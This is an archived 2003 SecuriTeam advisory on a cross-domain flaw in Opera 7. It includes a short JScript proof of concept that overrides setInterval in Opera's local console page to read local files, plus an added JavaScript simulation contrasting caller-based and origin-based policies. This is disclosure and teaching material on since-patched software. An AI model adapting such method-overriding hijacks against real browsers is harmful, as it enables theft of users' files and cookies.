[NT] Opera's Security Model Vulnerable to Attack

From: support@securiteam.com
Date: 02/10/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 10 Feb 2003 15:15:47 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Opera's Security Model Vulnerable to Attack
    ------------------------------------------------------------------------

    SUMMARY

    Opera recently released a new version of its browser.

    Version 7 brings many long-awaited features such as proper DOM support and
    an improved rendering engine. However, Opera seems to have neglected one
    of the most important aspects in any browser today, its default
    cross-domain security model.

    A vulnerability was found in Opera's security model that allows execution of
    arbitrary commands (under elevated privileges) and elevation of the privileges
    of commands by inserting Trojans into native methods.

    DETAILS

    Vulnerable systems:
     * Opera 7 on Windows operating system

    Immune systems:
     * Opera 7.01 on Windows operating system

    All browsers with JavaScript support deploy a cross-domain security model
    which, in essence, attempts to prevent documents from one domain from
    accessing documents in other domains.
    Opera 7 deployed a fundamentally different approach to cross-domain
    security: a caller-based model, rather than the origin-based model
    deployed in other browsers. The vulnerability consists of three
    different flaws in that model:

     * Functions in different domains can be accessed and executed.
     * Functions are executed under the caller's domain credentials rather
    than those of their originating domain.
     * It is possible to override properties and methods (both native and
    user-defined) in other windows.

    The first flaw means that a window in one domain is able to execute
    functions in a window that is in a different domain. By itself this flaw
    is not a big threat, because of the second flaw: even if a function in
    the victim window is executed, it runs with the attacker's credentials
    and is therefore unable to access the victim's document.

    The second flaw means that if the attacker can get the victim to execute a
    function, it will run under the victim's credentials. In addition, because
    of the first flaw, the victim will have no problems accessing a malicious
    function created by the attacker.

    The third and most devastating flaw means that the attacker is able to
    replace native methods in the victim window with his own code (a Trojan)
    and simply wait for the victim to execute it.
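    The three flaws above are easiest to see side by side with the origin-based model they depart from. The following is an added illustration, not code from the advisory or from Opera: two toy "window" objects are tagged with an origin, and two access-control policies are applied to them. The caller-based policy reproduces the behaviour the advisory describes (foreign functions reachable, run with the caller's credentials, foreign methods replaceable); the origin-based policy checks the target's origin on every access and runs a function with the credentials of the origin that defined it. The window names, origins and document contents are constructed for the example.

```javascript
// Added model of the two cross-domain policies; not Opera's implementation.
function makeWindow(origin, documentText) {
  const win = { origin, document: { text: documentText }, fns: {} };
  // A function defined by this window remembers its defining origin.
  win.define = (name, body) => { win.fns[name] = { definer: origin, body }; };
  return win;
}

// The only privileged operation in the model: reading a window's document
// with some set of credentials ("asOrigin").
function readDocument(asOrigin, target) {
  if (asOrigin !== target.origin) {
    throw new Error(`access denied: ${asOrigin} -> ${target.origin}`);
  }
  return target.document.text;
}

// Caller-based policy, as the advisory describes Opera 7.
const callerBased = {
  call(caller, target, name) {
    const fn = target.fns[name];            // flaw 1: any window's functions are reachable
    return fn.body(caller.origin);          // flaw 2: runs with the caller's credentials
  },
  override(caller, target, name, body) {
    target.fns[name] = { definer: caller.origin, body }; // flaw 3: foreign methods replaceable
  },
};

// Origin-based policy, as deployed in other browsers.
const originBased = {
  call(caller, target, name) {
    if (caller.origin !== target.origin) throw new Error("cross-origin call denied");
    const fn = target.fns[name];
    return fn.body(fn.definer);             // credentials of the defining origin
  },
  override(caller, target, name, body) {
    if (caller.origin !== target.origin) throw new Error("cross-origin property write denied");
    target.fns[name] = { definer: caller.origin, body };
  },
};

// Constructed windows: a local (file://) victim page and a remote page.
function setup() {
  const victim = makeWindow("file://localhost", "SECRET LOCAL CONTENT");
  const attacker = makeWindow("http://attacker.example", "remote page");
  // The victim page's own script calls this method early, like console.html's setInterval.
  victim.define("setInterval", () => "native timer installed");
  return { victim, attacker };
}

// Flaws 1 + 2 only: the remote window calls a victim function directly.
// Under the caller-based policy it runs with the remote window's credentials,
// so the document read fails; this is why flaw 1 alone is "not a big threat".
function runDirectCall(policy) {
  const { victim, attacker } = setup();
  let leaked = null;
  victim.define("dump", (asOrigin) => { leaked = readDocument(asOrigin, victim); return leaked; });
  try {
    policy.call(attacker, victim, "dump");
  } catch (e) {
    return { leaked, denied: e.message };
  }
  return { leaked, denied: null };
}

// All three flaws: the remote window replaces the victim's method, then the
// victim itself invokes that method (caller = victim), so the planted code
// runs with the victim's credentials under the caller-based policy.
function runOverride(policy) {
  const { victim, attacker } = setup();
  let leaked = null;
  try {
    policy.override(attacker, victim, "setInterval", (asOrigin) => {
      leaked = readDocument(asOrigin, victim);
      return "planted code ran";
    });
    policy.call(victim, victim, "setInterval");
  } catch (e) {
    return { leaked, denied: e.message };
  }
  return { leaked, denied: null };
}

console.log("caller-based, direct call:", runDirectCall(callerBased));
console.log("caller-based, override:   ", runOverride(callerBased));
console.log("origin-based, override:   ", runOverride(originBased));
```

Running the script shows the asymmetry the advisory describes: under the caller-based policy the direct call is denied but the override scenario leaks the local document, while the origin-based policy refuses the cross-origin write before any victim code runs (and, had the write succeeded, the planted function would still have carried its definer's credentials).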

    With these three flaws combined, it becomes extremely easy to exploit any
    document that uses some scripting, including local resources in the
    file:// protocol. Being able to access local resources in Opera means that
    the attacker would be able to:
     * Read any file on the user's file system.
     * Read the contents of directories on the user's file system.
     * Read emails written or received by M2, Opera's mail program.
     * And more...

    Exploit:
    A perfect candidate for exploitation is Opera's own JavaScript console,
    which arrives in the form of three separate files in Opera's installation
    directory.

    The file "console.html" makes a very early call to the native method
    "setInterval", which can be overridden by an attacking window. This
    scenario does not require any user interaction.
    <script language="jscript">
    // Open Opera's own JavaScript console from the local file:// directory.
    var oWin=open("file://localhost/console.html","","");
    // console.html calls the native setInterval early; override it from this
    // window so the replacement runs when the console page invokes it.
    oWin.setInterval=function () {
        alert("Access to local resource achieved: "+oWin.document.location.href);
    }
    </script>

    The "file://localhost/" URL appearing in this sample is a convenient
    method provided by Opera in order to access the selected directory
    (Opera's home by default).

    Demonstration:
    GreyMagic has put together two proof-of-concept demonstrations:
     * Simple (http://security.greymagic.com/adv/gm002-op/vmSimple.asp):
    Reads cookies from a few well-known sites and demonstrates access to a
    local resource.
     * GreyMagic Opera Disk Explorer
    (http://security.greymagic.com/adv/gm002-op/vmExp.asp): Browse your
    entire file system using this explorer-like tool, which takes advantage
    of this vulnerability in order to access local resources.

    Solution:
    Opera was notified of a variation of this issue on 14-Nov-2002, but
    apparently failed to understand the core issues and only patched one
    symptom of the problem (it was possible for foreign windows to simply set
    event handlers in Beta 1).

    In the meantime, until a patch becomes available, disable JavaScript by
    going to: File -> Preferences -> Multimedia, and uncheck the "Enable
    JavaScript" item.

    ADDITIONAL INFORMATION

    The original advisory can be found at:
    http://security.greymagic.com/adv/gm002-op/

    The information has been provided by GreyMagic Software
    <security@greymagic.com>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
